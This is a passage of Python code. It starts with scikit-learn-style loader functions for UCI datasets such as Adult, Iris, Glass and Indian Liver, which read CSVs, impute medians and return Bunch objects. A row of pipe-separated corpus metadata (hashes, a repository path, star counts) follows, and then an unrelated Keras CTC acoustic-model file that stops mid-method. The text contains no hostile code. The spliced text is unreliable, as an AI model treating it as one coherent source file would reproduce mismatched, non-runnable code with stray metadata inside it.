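# Worked example of the re-indexing above (np.unique sorts, so labels get
# contiguous indices in sorted order):
# >>> normalizeLabels(np.array([10, 2, 10, 7]))
# array([2, 0, 2, 1])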

def load_adult(return_X_y=False):
    """Load and return the adult incomes prediction dataset (classification).

    ================= ==============
    Classes                        2
    Samples per class  [37155,11687]
    Samples total              48842
    Dimensionality                14
    Features           int, positive
    ================= ==============

    Parameters
    ----------
    return_X_y : boolean, default=False.
        If True, returns ``(data, target)`` instead of a Bunch object.
        See below for more information about the `data` and `target` object.

    Returns
    -------
    data : Bunch
        Dictionary-like object, the interesting attributes are:
        'data', the data to learn, 'target', the classification targets,
        'DESCR', the full description of the dataset,
        and 'filename', the physical location of the dataset.

    (data, target) : tuple if ``return_X_y`` is True
    """
    module_path = dirname(__file__)

    fdescr_name = join(module_path, 'descr', 'adult.rst')
    with open(fdescr_name) as f:
        descr_text = f.read()

    data_file_name = join(module_path, 'data', 'adult.csv')
    with open(data_file_name) as f:
        data_file = csv.reader(f)
        temp = next(data_file)
        n_samples = int(temp[0])
        n_features = int(temp[1])
        data = np.empty((n_samples, n_features))
        target = np.empty((n_samples,), dtype=int)
        temp = next(data_file)  # names of features
        feature_names = np.array(temp)
        for i, d in enumerate(data_file):
            data[i] = np.asarray(d[:-1], dtype=np.float64)
            target[i] = np.asarray(d[-1], dtype=int)

    trans = SimpleImputer(strategy='median')
    data = trans.fit_transform(data)

    if return_X_y:
        return data, normalizeLabels(target)

    return Bunch(data=data,
                 target=normalizeLabels(target),
                 # last column is target value
                 feature_names=feature_names[:-1],
                 DESCR=descr_text,
                 filename=data_file_name)

def load_diabetes(return_X_y=False):
    """Load and return the Pima Indians Diabetes dataset (classification).

    ================= =====================
    Classes                               2
    Samples per class             [500,268]
    Samples total                       768
    Dimensionality                        8
    Features           int, float, positive
    ================= =====================

    Parameters
    ----------
    return_X_y : boolean, default=False.
        If True, returns ``(data, target)`` instead of a Bunch object.
        See below for more information about the `data` and `target` object.

    Returns
    -------
    data : Bunch
        Dictionary-like object, the interesting attributes are:
        'data', the data to learn, 'target', the classification targets,
        'DESCR', the full description of the dataset,
        and 'filename', the physical location of the dataset.

    (data, target) : tuple if ``return_X_y`` is True
    """
    module_path = dirname(__file__)

    fdescr_name = join(module_path, 'descr', 'diabetes.rst')
    with open(fdescr_name) as f:
        descr_text = f.read()

    data_file_name = join(module_path, 'data', 'diabetes.csv')
    with open(data_file_name) as f:
        data_file = csv.reader(f)
        temp = next(data_file)
        n_samples = int(temp[0])
        n_features = int(temp[1])
        data = np.empty((n_samples, n_features))
        target = np.empty((n_samples,), dtype=int)
        temp = next(data_file)  # names of features
        feature_names = np.array(temp)
        for i, d in enumerate(data_file):
            data[i] = np.asarray(d[:-1], dtype=np.float64)
            target[i] = np.asarray(d[-1], dtype=int)

    trans = SimpleImputer(strategy='median')
    data = trans.fit_transform(data)

    if return_X_y:
        return data, normalizeLabels(target)

    return Bunch(data=data,
                 target=normalizeLabels(target),
                 # last column is target value
                 feature_names=feature_names[:-1],
                 DESCR=descr_text,
                 filename=data_file_name)

def load_iris(return_X_y=False):
    """Load and return the Iris Plants Dataset (classification).

    ================= =====================
    Classes                               3
    Samples per class            [50,50,50]
    Samples total                       150
    Dimensionality                        4
    Features           int, float, positive
    ================= =====================

    Parameters
    ----------
    return_X_y : boolean, default=False.
        If True, returns ``(data, target)`` instead of a Bunch object.
        See below for more information about the `data` and `target` object.

    Returns
    -------
    data : Bunch
        Dictionary-like object, the interesting attributes are:
        'data', the data to learn, 'target', the classification targets,
        'DESCR', the full description of the dataset,
        and 'filename', the physical location of the dataset.

    (data, target) : tuple if ``return_X_y`` is True
    """
    module_path = dirname(__file__)

    fdescr_name = join(module_path, 'descr', 'iris.rst')
    with open(fdescr_name) as f:
        descr_text = f.read()

    data_file_name = join(module_path, 'data', 'iris.csv')
    with open(data_file_name) as f:
        data_file = csv.reader(f)
        temp = next(data_file)
        n_samples = int(temp[0])
        n_features = int(temp[1])
        data = np.empty((n_samples, n_features))
        target = np.empty((n_samples,), dtype=int)
        temp = next(data_file)  # names of features
        feature_names = np.array(temp)
        classes = []
        for i, d in enumerate(data_file):
            data[i] = np.asarray(d[:-1], dtype=np.float64)
            if d[-1] in classes:
                index = classes.index(d[-1])
                target[i] = np.asarray(index, dtype=int)
            else:
                classes.append(d[-1])
                target[i] = np.asarray(classes.index(d[-1]), dtype=int)

    trans = SimpleImputer(strategy='median')
    data = trans.fit_transform(data)

    if return_X_y:
        return data, normalizeLabels(target)

    return Bunch(data=data,
                 target=normalizeLabels(target),
                 # last column is target value
                 feature_names=feature_names[:-1],
                 DESCR=descr_text,
                 filename=data_file_name)

def load_redwine(return_X_y=False):
    """Load and return the Wine Quality dataset (classification).

    ================= =====================
    Classes                              10
    Samples total                      6497
    Dimensionality                       11
    Features           int, float, positive
    ================= =====================

    Parameters
    ----------
    return_X_y : boolean, default=False.
        If True, returns ``(data, target)`` instead of a Bunch object.
        See below for more information about the `data` and `target` object.

    Returns
    -------
    data : Bunch
        Dictionary-like object, the interesting attributes are:
        'data', the data to learn, 'target', the classification targets,
        'DESCR', the full description of the dataset,
        and 'filename', the physical location of the dataset.

    (data, target) : tuple if ``return_X_y`` is True
    """
    module_path = dirname(__file__)

    fdescr_name = join(module_path, 'descr', 'redwine.rst')
    with open(fdescr_name) as f:
        descr_text = f.read()

    data_file_name = join(module_path, 'data', 'redwine.csv')
    with open(data_file_name) as f:
        data_file = csv.reader(f)
        temp = next(data_file)
        n_samples = int(temp[0])
        n_features = int(temp[1])
        data = np.empty((n_samples, n_features))
        target = np.empty((n_samples,), dtype=int)
        temp = next(data_file)  # names of features
        feature_names = np.array(temp)
        for i, d in enumerate(data_file):
            data[i] = np.asarray([float(v) for v in d[:-1]],
                                 dtype=np.float64)
            target[i] = np.asarray(d[-1], dtype=int)

    trans = SimpleImputer(strategy='median')
    data = trans.fit_transform(data)

    if return_X_y:
        return data, normalizeLabels(target)

    return Bunch(data=data,
                 target=normalizeLabels(target),
                 # last column is target value
                 feature_names=feature_names[:-1],
                 DESCR=descr_text,
                 filename=data_file_name)

def load_forestcov(return_X_y=False):
    """Load and return the Forest Covertype dataset (classification).

    ================= =========================
    Classes                                   7
    Samples per class      [211840,283301,35754,
                       2747,9493,17367,20510]
    Samples total                        581012
    Dimensionality                           54
    Features               int, float, positive
    ================= =========================

    Parameters
    ----------
    return_X_y : boolean, default=False.
        If True, returns ``(data, target)`` instead of a Bunch object.
        See below for more information about the `data` and `target` object.

    Returns
    -------
    data : Bunch
        Dictionary-like object, the interesting attributes are:
        'data', the data to learn, 'target', the classification targets,
        'DESCR', the full description of the dataset,
        and 'filename', the physical location of the dataset.

    (data, target) : tuple if ``return_X_y`` is True
    """
    module_path = dirname(__file__)

    fdescr_name = join(module_path, 'descr', 'forestcov.rst')
    with open(fdescr_name) as f:
        descr_text = f.read()

    data_file_name = join(module_path, 'data', 'forestcov.csv')
    with open(data_file_name) as f:
        data_file = csv.reader(f)
        temp = next(data_file)
        n_samples = int(temp[0])
        n_features = int(temp[1])
        data = np.empty((n_samples, n_features))
        target = np.empty((n_samples,), dtype=int)
        temp = next(data_file)  # names of features
        feature_names = np.array(temp)
        for i, d in enumerate(data_file):
            data[i] = np.asarray(d[:-1], dtype=np.float64)
            target[i] = np.asarray(d[-1], dtype=int)

    trans = SimpleImputer(strategy='median')
    data = trans.fit_transform(data)

    if return_X_y:
        return data, normalizeLabels(target)

    return Bunch(data=data,
                 target=normalizeLabels(target),
                 # last column is target value
                 feature_names=feature_names[:-1],
                 DESCR=descr_text,
                 filename=data_file_name)

def load_letterrecog(return_X_y=False):
    """Load and return the Letter Recognition dataset (classification).

    ================= =====================
    Classes                              26
    Samples total                     20000
    Dimensionality                       16
    Features           int, float, positive
    ================= =====================

    Parameters
    ----------
    return_X_y : boolean, default=False.
        If True, returns ``(data, target)`` instead of a Bunch object.
        See below for more information about the `data` and `target` object.

    Returns
    -------
    data : Bunch
        Dictionary-like object, the interesting attributes are:
        'data', the data to learn, 'target', the classification targets,
        'DESCR', the full description of the dataset,
        and 'filename', the physical location of the dataset.

    (data, target) : tuple if ``return_X_y`` is True
    """
    module_path = dirname(__file__)

    fdescr_name = join(module_path, 'descr', 'letter-recognition.rst')
    with open(fdescr_name) as f:
        descr_text = f.read()

    data_file_name = join(module_path, 'data', 'letter-recognition.csv')
    with open(data_file_name) as f:
        data_file = csv.reader(f)
        temp = next(data_file)
        n_samples = int(temp[0])
        n_features = int(temp[1])
        data = np.empty((n_samples, n_features))
        target = np.empty((n_samples,), dtype=int)
        temp = next(data_file)  # names of features
        feature_names = np.array(temp)
        classes = []
        for i, d in enumerate(data_file):
            data[i] = np.asarray(d[1:], dtype=np.float64)
            if d[0] in classes:
                index = classes.index(d[0])
                target[i] = np.asarray(index, dtype=int)
            else:
                classes.append(d[0])
                target[i] = np.asarray(classes.index(d[0]), dtype=int)

    trans = SimpleImputer(strategy='median')
    data = trans.fit_transform(data)

    if return_X_y:
        return data, normalizeLabels(target)

    return Bunch(data=data,
                 target=normalizeLabels(target),
                 # first column is the target value
                 feature_names=feature_names[1:],
                 DESCR=descr_text,
                 filename=data_file_name)

def load_ecoli(return_X_y=False):
    """Load and return the Ecoli protein localization dataset (classification).

    ================= =======================
    Classes                                 8
    Samples per class [143,77,52,35,20,5,2,2]
    Samples total                         336
    Dimensionality                          8
    Features             int, float, positive
    ================= =======================

    Parameters
    ----------
    return_X_y : boolean, default=False.
        If True, returns ``(data, target)`` instead of a Bunch object.
        See below for more information about the `data` and `target` object.

    Returns
    -------
    data : Bunch
        Dictionary-like object, the interesting attributes are:
        'data', the data to learn, 'target', the classification targets,
        'DESCR', the full description of the dataset,
        and 'filename', the physical location of the dataset.

    (data, target) : tuple if ``return_X_y`` is True
    """
    module_path = dirname(__file__)

    fdescr_name = join(module_path, 'descr', 'ecoli.rst')
    with open(fdescr_name) as f:
        descr_text = f.read()

    data_file_name = join(module_path, 'data', 'ecoli.csv')
    with open(data_file_name) as f:
        data_file = csv.reader(f)
        temp = next(data_file)
        n_samples = int(temp[0])
        n_features = int(temp[1])
        data = np.empty((n_samples, n_features))
        target = np.empty((n_samples,), dtype=int)
        temp = next(data_file)  # names of features
        feature_names = np.array(temp[1:])
        classes = []
        for i, d in enumerate(data_file):
            data[i] = np.asarray([float(v) for v in d[1:-1]], dtype=np.float64)
            if d[-1] in classes:
                index = classes.index(d[-1])
                target[i] = np.asarray(index, dtype=int)
            else:
                classes.append(d[-1])
                target[i] = np.asarray(classes.index(d[-1]), dtype=int)

    trans = SimpleImputer(strategy='median')
    data = trans.fit_transform(data)

    if return_X_y:
        return data, normalizeLabels(target)

    return Bunch(data=data,
                 target=normalizeLabels(target),
                 # last column is target value
                 feature_names=feature_names[:-1],
                 DESCR=descr_text,
                 filename=data_file_name)

def load_vehicle(return_X_y=False):
    """Load and return the Vehicle Silhouettes dataset (classification).

    ================= =====================
    Classes                               4
    Samples per class     [240,240,240,226]
    Samples total                       846
    Dimensionality                       18
    Features           int, float, positive
    ================= =====================

    Parameters
    ----------
    return_X_y : boolean, default=False.
        If True, returns ``(data, target)`` instead of a Bunch object.
        See below for more information about the `data` and `target` object.

    Returns
    -------
    data : Bunch
        Dictionary-like object, the interesting attributes are:
        'data', the data to learn, 'target', the classification targets,
        'DESCR', the full description of the dataset,
        and 'filename', the physical location of the dataset.

    (data, target) : tuple if ``return_X_y`` is True
    """
    module_path = dirname(__file__)

    fdescr_name = join(module_path, 'descr', 'vehicle.doc')
    with open(fdescr_name) as f:
        descr_text = f.read()

    data_file_name = join(module_path, 'data', 'vehicle.csv')
    with open(data_file_name) as f:
        data_file = csv.reader(f)
        temp = next(data_file)
        n_samples = int(temp[0])
        n_features = int(temp[1])
        data = np.empty((n_samples, n_features))
        target = np.empty((n_samples,), dtype=int)
        temp = next(data_file)  # names of features
        feature_names = np.array(temp[1:])
        classes = []
        for i, d in enumerate(data_file):
            data[i] = np.asarray(d[:-1], dtype=np.float64)
            if d[-1] in classes:
                index = classes.index(d[-1])
                target[i] = np.asarray(index, dtype=int)
            else:
                classes.append(d[-1])
                target[i] = np.asarray(classes.index(d[-1]), dtype=int)

    trans = SimpleImputer(strategy='median')
    data = trans.fit_transform(data)

    if return_X_y:
        return data, normalizeLabels(target)

    return Bunch(data=data,
                 target=normalizeLabels(target),
                 # last column is target value
                 feature_names=feature_names[:-1],
                 DESCR=descr_text,
                 filename=data_file_name)

def load_segment(return_X_y=False):
    """Load and return the Image Segmentation dataset (classification).

    ================= =====================
    Classes                               7
    Samples total                      2310
    Dimensionality                       19
    Features           int, float, positive
    ================= =====================

    Parameters
    ----------
    return_X_y : boolean, default=False.
        If True, returns ``(data, target)`` instead of a Bunch object.
        See below for more information about the `data` and `target` object.

    Returns
    -------
    data : Bunch
        Dictionary-like object, the interesting attributes are:
        'data', the data to learn, 'target', the classification targets,
        'DESCR', the full description of the dataset,
        and 'filename', the physical location of the segment csv dataset.

    (data, target) : tuple if ``return_X_y`` is True
    """
    module_path = dirname(__file__)

    fdescr_name = join(module_path, 'descr', 'segment.doc')
    with open(fdescr_name) as f:
        descr_text = f.read()

    data_file_name = join(module_path, 'data', 'segment.csv')
    with open(data_file_name) as f:
        data_file = csv.reader(f)
        temp = next(data_file)
        n_samples = int(temp[0])
        n_features = int(temp[1])
        data = np.empty((n_samples, n_features))
        target = np.empty((n_samples,), dtype=np.int64)
        temp = next(data_file)  # names of features
        feature_names = np.array(temp)
        for i, d in enumerate(data_file):
            try:
                data[i] = np.asarray([float(v) for v in d[:-1]],
                                     dtype=np.float64)
            except ValueError:
                print(i, d[:-1])
            target[i] = np.asarray(d[-1], dtype=np.int64)

    trans = SimpleImputer(strategy='median')
    data = trans.fit_transform(data)

    if return_X_y:
        return data, normalizeLabels(target)

    return Bunch(data=data,
                 target=normalizeLabels(target),
                 # last column is target value
                 feature_names=feature_names[:-1],
                 DESCR=descr_text,
                 filename=data_file_name)

def load_satellite(return_X_y=False):
    """Load and return the Statlog (Landsat Satellite) dataset (classification).

    ================= =====================
    Classes                               6
    Samples total                      6435
    Dimensionality                       36
    Features           int, float, positive
    ================= =====================

    Parameters
    ----------
    return_X_y : boolean, default=False.
        If True, returns ``(data, target)`` instead of a Bunch object.
        See below for more information about the `data` and `target` object.

    Returns
    -------
    data : Bunch
        Dictionary-like object, the interesting attributes are:
        'data', the data to learn, 'target', the classification targets,
        'DESCR', the full description of the dataset,
        and 'filename', the physical location of the satellite csv dataset.

    (data, target) : tuple if ``return_X_y`` is True
    """
    module_path = dirname(__file__)

    fdescr_name = join(module_path, 'descr', 'satellite.doc')
    with open(fdescr_name) as f:
        descr_text = f.read()

    data_file_name = join(module_path, 'data', 'satellite.csv')
    with open(data_file_name) as f:
        data_file = csv.reader(f)
        temp = next(data_file)
        n_samples = int(temp[0])
        n_features = int(temp[1])
        data = np.empty((n_samples, n_features))
        target = np.empty((n_samples,), dtype=np.int64)
        temp = next(data_file)  # names of features
        feature_names = np.array(temp)
        for i, d in enumerate(data_file):
            try:
                data[i] = np.asarray(d[:-1], dtype=np.float64)
            except ValueError:
                print(i, d[:-1])
            target[i] = np.asarray(d[-1], dtype=np.int64)

    trans = SimpleImputer(strategy='median')
    data = trans.fit_transform(data)

    if return_X_y:
        return data, normalizeLabels(target)

    return Bunch(data=data,
                 target=normalizeLabels(target),
                 # last column is target value
                 feature_names=feature_names[:-1],
                 DESCR=descr_text,
                 filename=data_file_name)

def load_optdigits(return_X_y=False):
    """Load and return the Optical Recognition of Handwritten Digits dataset
    (classification).

    ================= =====================
    Classes                              10
    Samples total                      5620
    Dimensionality                       64
    Features           int, float, positive
    ================= =====================

    Parameters
    ----------
    return_X_y : boolean, default=False.
        If True, returns ``(data, target)`` instead of a Bunch object.
        See below for more information about the `data` and `target` object.

    Returns
    -------
    data : Bunch
        Dictionary-like object, the interesting attributes are:
        'data', the data to learn, 'target', the classification targets,
        'DESCR', the full description of the dataset,
        and 'filename', the physical location of the optdigits csv dataset.

    (data, target) : tuple if ``return_X_y`` is True
    """
    module_path = dirname(__file__)

    fdescr_name = join(module_path, 'descr', 'optdigits.rst')
    with open(fdescr_name) as f:
        descr_text = f.read()

    data_file_name = join(module_path, 'data', 'optdigits.csv')
    with open(data_file_name) as f:
        data_file = csv.reader(f)
        temp = next(data_file)
        n_samples = int(temp[0])
        n_features = int(temp[1])
        data = np.empty((n_samples, n_features))
        target = np.empty((n_samples,), dtype=np.int64)
        temp = next(data_file)  # names of features
        feature_names = np.array(temp)
        for i, d in enumerate(data_file):
            try:
                data[i] = np.asarray(d[:-1], dtype=np.float64)
            except ValueError:
                print(i, d[:-1])
            target[i] = np.asarray(d[-1], dtype=np.int64)

    trans = SimpleImputer(strategy='median')
    data = trans.fit_transform(data)

    if return_X_y:
        return data, normalizeLabels(target)

    return Bunch(data=data,
                 target=normalizeLabels(target),
                 # last column is target value
                 feature_names=feature_names[:-1],
                 DESCR=descr_text,
                 filename=data_file_name)

def load_credit(return_X_y=False):
    """Load and return the Credit Approval prediction dataset (classification).

    ================= =====================
    Classes                               2
    Samples per class            [383, 307]
    Samples total                       690
    Dimensionality                       15
    Features           int, float, positive
    ================= =====================

    Parameters
    ----------
    return_X_y : boolean, default=False.
        If True, returns ``(data, target)`` instead of a Bunch object.
        See below for more information about the `data` and `target` object.

    Returns
    -------
    data : Bunch
        Dictionary-like object, the interesting attributes are:
        'data', the data to learn, 'target', the classification targets,
        'DESCR', the full description of the dataset,
        and 'filename', the physical location of the credit csv dataset.

    (data, target) : tuple if ``return_X_y`` is True
    """
    module_path = dirname(__file__)

    fdescr_name = join(module_path, 'descr', 'credit.rst')
    with open(fdescr_name) as f:
        descr_text = f.read()

    data_file_name = join(module_path, 'data', 'credit.csv')
    with open(data_file_name) as f:
        data_file = csv.reader(f)
        temp = next(data_file)
        n_samples = int(temp[0])
        n_features = int(temp[1])
        data = np.empty((n_samples, n_features))
        target = np.empty((n_samples,), dtype=np.int64)
        temp = next(data_file)  # names of features
        feature_names = np.array(temp)
        for i, d in enumerate(data_file):
            try:
                data[i] = np.asarray(d[:-1], dtype=np.float64)
            except ValueError:
                print(i, d[:-1])
            target[i] = np.asarray(d[-1], dtype=np.int64)

    trans = SimpleImputer(strategy='median')
    data = trans.fit_transform(data)

    if return_X_y:
        return data, normalizeLabels(target)

    return Bunch(data=data,
                 target=normalizeLabels(target),
                 # last column is target value
                 feature_names=feature_names[:-1],
                 DESCR=descr_text,
                 filename=data_file_name)

def load_magic(return_X_y=False):
    """Load and return the Magic Gamma Telescope dataset (classification).

    =========================================
    Classes                                 2
    Samples per class            [6688,12332]
    Samples total                       19020
    Dimensionality                         10
    Features                            float
    =========================================

    Parameters
    ----------
    return_X_y : boolean, default=False.
        If True, returns ``(data, target)`` instead of a Bunch object.
        See below for more information about the `data` and `target` object.

    Returns
    -------
    data : Bunch
        Dictionary-like object, the interesting attributes are:
        'data', the data to learn, 'target', the classification targets,
        'DESCR', the full description of the dataset,
        and 'filename', the physical location of the magic csv dataset.

    (data, target) : tuple if ``return_X_y`` is True
    """
    module_path = dirname(__file__)

    fdescr_name = join(module_path, 'descr', 'magic.rst')
    with open(fdescr_name) as f:
        descr_text = f.read()

    data_file_name = join(module_path, 'data', 'magic.csv')
    with open(data_file_name) as f:
        data_file = csv.reader(f)
        temp = next(data_file)
        n_samples = int(temp[0])
        n_features = int(temp[1])
        data = np.empty((n_samples, n_features))
        # Labels are single characters ('g'/'h'), so a fixed-width string dtype is enough.
        target = np.empty((n_samples,), dtype=str)
        temp = next(data_file)  # names of features
        feature_names = np.array(temp)
        for i, d in enumerate(data_file):
            data[i] = np.asarray(d[:-1], dtype=np.float64)
            target[i] = np.asarray(d[-1], dtype=str)

    trans = SimpleImputer(strategy='median')
    data = trans.fit_transform(data)

    if return_X_y:
        return data, normalizeLabels(target)

    return Bunch(data=data,
                 target=normalizeLabels(target),
                 # last column is target value
                 feature_names=feature_names[:-1],
                 DESCR=descr_text,
                 filename=data_file_name)

def load_glass(return_X_y=False):
    """Load and return the Glass Identification Data Set (classification).

    ===========================================
    Classes                                   6
    Samples per class   [70, 76, 17, 29, 13, 9]
    Samples total                           214
    Dimensionality                            9
    Features                              float
    ===========================================

    Parameters
    ----------
    return_X_y : boolean, default=False.
        If True, returns ``(data, target)`` instead of a Bunch object.
        See below for more information about the `data` and `target` object.

    Returns
    -------
    data : Bunch
        Dictionary-like object, the interesting attributes are:
        'data', the data to learn, 'target', the classification targets,
        'DESCR', the full description of the dataset,
        and 'filename', the physical location of the glass csv dataset.

    (data, target) : tuple if ``return_X_y`` is True
    """
    module_path = dirname(__file__)

    fdescr_name = join(module_path, 'descr', 'glass.rst')
    with open(fdescr_name) as f:
        descr_text = f.read()

    data_file_name = join(module_path, 'data', 'glass.csv')
    with open(data_file_name) as f:
        data_file = csv.reader(f)
        temp = next(data_file)
        n_samples = int(temp[0])
        n_features = int(temp[1])
        data = np.empty((n_samples, n_features))
        target = np.empty((n_samples,), dtype=np.int64)
        for i, d in enumerate(data_file):
            try:
                data[i] = np.asarray(d[:-1], dtype=np.float64)
            except ValueError:
                print(i, d[:-1])
            target[i] = np.asarray(d[-1], dtype=np.int64)

    trans = SimpleImputer(strategy='median')
    data = trans.fit_transform(data)

    if return_X_y:
        return data, normalizeLabels(target)

    return Bunch(data=data, target=normalizeLabels(target),
                 DESCR=descr_text,
                 feature_names=['RI: refractive index',
                                "Na: Sodium (unit measurement: "
                                "weight percent in corresponding oxide, "
                                "as are attributes 4-10)",
                                'Mg: Magnesium',
                                'Al: Aluminum',
                                'Si: Silicon',
                                'K: Potassium',
                                'Ca: Calcium',
                                'Ba: Barium',
                                'Fe: Iron'])

def load_haberman(return_X_y=False):
    """Load and return the Haberman's Survival Data Set (classification).

    ==============================
    Classes                      2
    Samples per class    [225, 82]
    Samples total              306
    Dimensionality               3
    Features                   int
    ==============================

    Parameters
    ----------
    return_X_y : boolean, default=False.
        If True, returns ``(data, target)`` instead of a Bunch object.
        See below for more information about the `data` and `target` object.

    Returns
    -------
    data : Bunch
        Dictionary-like object, the interesting attributes are:
        'data', the data to learn, 'target', the classification targets,
        'DESCR', the full description of the dataset,
        and 'filename', the physical location of the haberman csv dataset.

    (data, target) : tuple if ``return_X_y`` is True
    """
    module_path = dirname(__file__)

    fdescr_name = join(module_path, 'descr', 'haberman.rst')
    with open(fdescr_name) as f:
        descr_text = f.read()

    data_file_name = join(module_path, 'data', 'haberman.csv')
    with open(data_file_name) as f:
        data_file = csv.reader(f)
        temp = next(data_file)
        n_samples = int(temp[0])
        n_features = int(temp[1])
        data = np.empty((n_samples, n_features))
        target = np.empty((n_samples,), dtype=np.int64)
        for i, d in enumerate(data_file):
            try:
                data[i] = np.asarray(d[:-1], dtype=np.float64)
            except ValueError:
                print(i, d[:-1])
            target[i] = np.asarray(d[-1], dtype=np.int64)

    trans = SimpleImputer(strategy='median')
    data = trans.fit_transform(data)

    if return_X_y:
        return data, normalizeLabels(target)

    return Bunch(data=data, target=normalizeLabels(target),
                 DESCR=descr_text,
                 feature_names=['PatientAge',
                                'OperationYear',
                                'PositiveAxillaryNodesDetected'])

def load_mammographic(return_X_y=False):
    """Load and return the Mammographic Mass Data Set (classification).

    ==============================
    Classes                      2
    Samples per class   [516, 445]
    Samples total              961
    Dimensionality               5
    Features                   int
    ==============================

    Parameters
    ----------
    return_X_y : boolean, default=False.
        If True, returns ``(data, target)`` instead of a Bunch object.
        See below for more information about the `data` and `target` object.

    Returns
    -------
    data : Bunch
        Dictionary-like object, the interesting attributes are:
        'data', the data to learn, 'target', the classification targets,
        'DESCR', the full description of the dataset,
        and 'filename', the physical location of the mammographic csv dataset.

    (data, target) : tuple if ``return_X_y`` is True
    """
    module_path = dirname(__file__)
    # fdescr_name = join(module_path, 'descr', 'mammographic.rst')
    # with open(fdescr_name) as f:
    #     descr_text = f.read()

    data_file_name = join(module_path, 'data', 'mammographic.csv')
    with open(data_file_name) as f:
        data_file = csv.reader(f)
        temp = next(data_file)
        n_samples = int(temp[0])
        n_features = int(temp[1])
        data = np.empty((n_samples, n_features))
        target = np.empty((n_samples,), dtype=np.int64)
        for i, d in enumerate(data_file):
            try:
                data[i] = np.asarray(d[:-1], dtype=np.float64)
            except ValueError:
                print(i, d[:-1])
            target[i] = np.asarray(d[-1], dtype=np.int64)

    trans = SimpleImputer(strategy='median')
    data = trans.fit_transform(data)

    if return_X_y:
        return data, normalizeLabels(target)

    return Bunch(data=data, target=normalizeLabels(target),
                 DESCR=None,
                 feature_names=['BI-RADS',
                                'age',
                                'shape',
                                'margin',
                                'density'])

def load_indian_liver(return_X_y=False):
    """Load and return the Indian Liver Patient Data Set (classification).

    =========================================================
    Classes                                                 2
    Samples per class                              [416, 167]
    Samples total                                         583
    Dimensionality                                         10
    Features                                       int, float
    Missing Values                                    4 (nan)
    =========================================================

    Parameters
    ----------
    return_X_y : boolean, default=False.
        If True, returns ``(data, target)`` instead of a Bunch object.
        See below for more information about the `data` and `target` object.

    Returns
    -------
    data : Bunch
        Dictionary-like object, the interesting attributes are:
        'data', the data to learn, 'target', the classification targets,
        'DESCR', the full description of the dataset,
        and 'filename', the physical location of the indian liver csv dataset.

    (data, target) : tuple if ``return_X_y`` is True
    """
    module_path = dirname(__file__)

    with open(join(module_path, 'data',
                   'indianLiverPatient.csv')) as csv_file:
        data_file = csv.reader(csv_file)
        temp = next(data_file)
        n_samples = int(temp[0])
        n_features = int(temp[1])
        target_names = np.array(temp[2:])
        data = np.empty((n_samples, n_features))
        target = np.empty((n_samples, ), dtype=int)
        for i, ir in enumerate(data_file):
            data[i] = np.asarray(ir[:-1], dtype=np.float64)
            target[i] = np.asarray(ir[-1], dtype=int)

    # with open(join(module_path, 'descr',
    #                'indianLiverPatient.rst')) as rst_file:
    #     fdescr = [line.decode('utf-8').strip() \
    #               for line in rst_file.readlines()]

    trans = SimpleImputer(strategy='median')
    data = trans.fit_transform(data)

    if return_X_y:
        return data, normalizeLabels(target)

    return Bunch(data=data, target=normalizeLabels(target),
                 target_names=target_names,
                 DESCR=None,
                 feature_names=['Age of the patient',
                                'Gender of the patient',
                                'Total Bilirubin',
                                'Direct Bilirubin',
                                'Alkaline Phosphotase',
                                'Alamine Aminotransferase',
                                'Aspartate Aminotransferase',
                                'Total Protiens',
                                'Albumin',
                                'A/G Ratio'])
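
# Illustrative usage sketch for the loaders above; both calling conventions are
# shown, and the expected iris shape follows its docstring.
if __name__ == '__main__':
    X, y = load_iris(return_X_y=True)
    print(X.shape, y.shape)  # expected: (150, 4) (150,)
    bunch = load_haberman()
    print(bunch.feature_names, bunch.data.shape)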
| 34.326672 | 79 | 0.543002 | 4,519 | 39,510 | 4.605444 | 0.06351 | 0.041899 | 0.026139 | 0.016337 | 0.895781 | 0.893667 | 0.889967 | 0.876321 | 0.85369 | 0.85369 | 0 | 0.016485 | 0.322906 | 39,510 | 1,150 | 80 | 34.356522 | 0.761476 | 0.404353 | 0 | 0.800766 | 0 | 0 | 0.048655 | 0.004332 | 0 | 0 | 0 | 0 | 0 | 1 | 0.034483 | false | 0 | 0.009579 | 0 | 0.111111 | 0.01341 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
7473fa73c2d44723610aaa696e1daaeac4c670f3 | 8,261 | py | Python | acoustic/MAXM.py | sailist/ASRFrame | 2fd022c3c00af1d5178dee4b367b2269241bc73c | [
"Apache-2.0"
] | 223 | 2019-07-13T06:31:18.000Z | 2022-03-11T08:23:01.000Z | acoustic/MAXM.py | mayite/ASRFrame | 484cf1ee5beec4c39439de683c5b4c1f1ea3a94a | [
"Apache-2.0"
] | 7 | 2019-12-27T08:48:42.000Z | 2021-09-01T09:45:13.000Z | acoustic/MAXM.py | mayite/ASRFrame | 484cf1ee5beec4c39439de683c5b4c1f1ea3a94a | [
"Apache-2.0"
] | 71 | 2019-07-14T13:14:13.000Z | 2022-03-18T06:58:54.000Z | from core.base_model import AcousticModel
from keras.layers import Dense,Activation,Dropout,Input,Add
from core.ctc_function import CTC_Batch_Cost
from keras import Model
import os
from util.mapmap import PinyinMapper
from util.reader import VoiceDatasetList,VoiceLoader
from feature.mel_feature import MelFeature5
class MCONM(AcousticModel):
    '''An attempt at wiring each layer's convolutions together; a transfer
    experiment from the Somiao input-method model to an acoustic model.
    2019-07-14 14:36:13: on the thchs30 dataset, epoch=55, loss=59, essentially
    unable to decrease further; abandoned.
    '''
    def compile(self, feature_shape=(1024, 200), label_max_string_length=32, ms_output_size=1423):
        audio_ipt = Input(name="audio_input", shape=feature_shape)
        parent_out = self.parent(audio_ipt, 128)

        layer_h1 = self.conv1d_layers(audio_ipt, 64, 8)
        layer_h2 = self.cnn1d_cell(64, layer_h1, pool=False)
        layer_h3 = Add()([parent_out, layer_h2])

        layer_h6 = Dropout(0.2)(layer_h3)  # KL, double Dense
        layer_h7 = Dense(256, activation="relu", kernel_initializer="he_normal")(layer_h6)  # TODO: consider adding Attention here
        layer_h7 = Dropout(0.2)(layer_h7)
        layer_h8 = Dense(ms_output_size)(layer_h7)
        y_pred = Activation(activation="softmax")(layer_h8)

        y_true = Input(name='label_inputs', shape=[label_max_string_length], dtype='float32')
        audio_length = Input(name='audio_length', shape=[1], dtype='int64')
        label_length = Input(name='label_length', shape=[1], dtype='int64')
        loss_out = CTC_Batch_Cost()([y_true, y_pred, audio_length, label_length])

